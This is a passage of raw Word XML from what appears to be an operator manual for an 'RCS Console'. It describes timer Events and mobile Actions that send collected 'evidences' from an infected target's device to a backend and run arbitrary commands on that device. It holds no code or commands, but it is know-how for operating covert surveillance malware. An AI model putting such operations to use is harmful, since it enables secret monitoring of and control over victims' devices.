          <w:p w:rsidR="0029138B" w:rsidRDefault="00732ABF" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.13</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="0029138B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="0029138B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00A52C9B" w:rsidRDefault="0029138B" w:rsidP="00127C42">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w:t>
            </w:r>
            <w:r w:rsidR="00127C42">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Standby</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E64C3B">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00E64C3B">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="00E64C3B">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows to specify if the Event is active or not. If an Event is not enabled no connected Actions will be called.</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Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00E64C3B">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Event’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00247880" w:rsidRPr="0029750F" w:rsidRDefault="00247880" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00247880">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E64C3B">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00E64C3B">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00E64C3B">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029138B" w:rsidRPr="00E64C3B" w:rsidRDefault="0029138B" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>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127C42" w:rsidTr="00C50CE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00127C42" w:rsidRDefault="003A4380" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1248" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:193.5pt;z-index:251849728;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId107" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1248" DrawAspect="Content" ObjectID="_1446455385" r:id="rId271"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00127C42" w:rsidRDefault="00732ABF" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.14</w:t>
            </w:r>
            <w:r w:rsidR="00127C42">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00127C42" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00127C42">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00127C42" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00127C42">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00127C42" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00127C42">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00127C42" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00127C42" w:rsidRPr="00A52C9B" w:rsidRDefault="00127C42" w:rsidP="00127C42">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Event (Timer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00127C42" w:rsidRDefault="00127C42" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00127C42" w:rsidRPr="00E64C3B" w:rsidRDefault="00127C42" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00127C42" w:rsidRPr="00E64C3B" w:rsidRDefault="00127C42" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D675C5" w:rsidRPr="0029750F" w:rsidRDefault="00D675C5" w:rsidP="00D675C5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows to specify if the Event is active or not. If an Event is not enabled no connected Actions will be called.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D675C5" w:rsidRPr="0029750F" w:rsidRDefault="00D675C5" w:rsidP="00D675C5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D675C5" w:rsidRPr="0029750F" w:rsidRDefault="00D675C5" w:rsidP="00D675C5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Event’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D675C5" w:rsidRPr="0029750F" w:rsidRDefault="00D675C5" w:rsidP="00D675C5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D675C5" w:rsidRPr="0029750F" w:rsidRDefault="00D675C5" w:rsidP="00D675C5">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(1) allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D675C5" w:rsidRPr="0029750F" w:rsidRDefault="00D675C5" w:rsidP="00D675C5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00127C42" w:rsidRPr="00E64C3B" w:rsidRDefault="00D675C5" w:rsidP="00D675C5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="0029750F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] (2) allows you to specify the sub-type of the Timer Event. It can be “Loop”, “Daily”, “Date” or “AfterInst</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0029138B" w:rsidRDefault="0029138B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007703E3" w:rsidRDefault="007703E3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F512E" w:rsidRPr="00EC6F13" w:rsidRDefault="005F512E" w:rsidP="00C50CE7">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc372642513"/>
      <w:r w:rsidRPr="00EC6F13">
        <w:lastRenderedPageBreak/>
        <w:t>Mobile Actions Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F512E" w:rsidRPr="00B965F4" w:rsidRDefault="005F512E" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By clicking on the button Add Action you can add a new element in the line of Actions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Within a Mobile Factory there’re 6 different Actions available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="005F512E">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56"/>
        <w:gridCol w:w="6616"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F512E" w:rsidTr="005F512E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="945">
                <v:shape id="_x0000_i1082" type="#_x0000_t75" style="width:127.5pt;height:47.25pt" o:ole="">
                  <v:imagedata r:id="rId116" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1082" DrawAspect="Content" ObjectID="_1446455297" r:id="rId272"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00671455" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Synchronize</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00671455" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E1646">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Synchronize </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="009E1646">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sends all the pending evidences from the target to the RCS Backend and checks for agent configuration updates.</w:t>
            </w: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RPr="005701FD" w:rsidTr="005F512E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6621" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="005F512E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="945">
                <v:shape id="_x0000_i1083" type="#_x0000_t75" style="width:127.5pt;height:47.25pt" o:ole="">
                  <v:imagedata r:id="rId118" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1083" DrawAspect="Content" ObjectID="_1446455298" r:id="rId273"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00671455" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Execute</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00671455" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Execute </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction runs an arbitrary command on the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected T</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>’s device</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w: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RPr="005701FD" w:rsidTr="005F512E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2761" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6621" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="005701FD" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
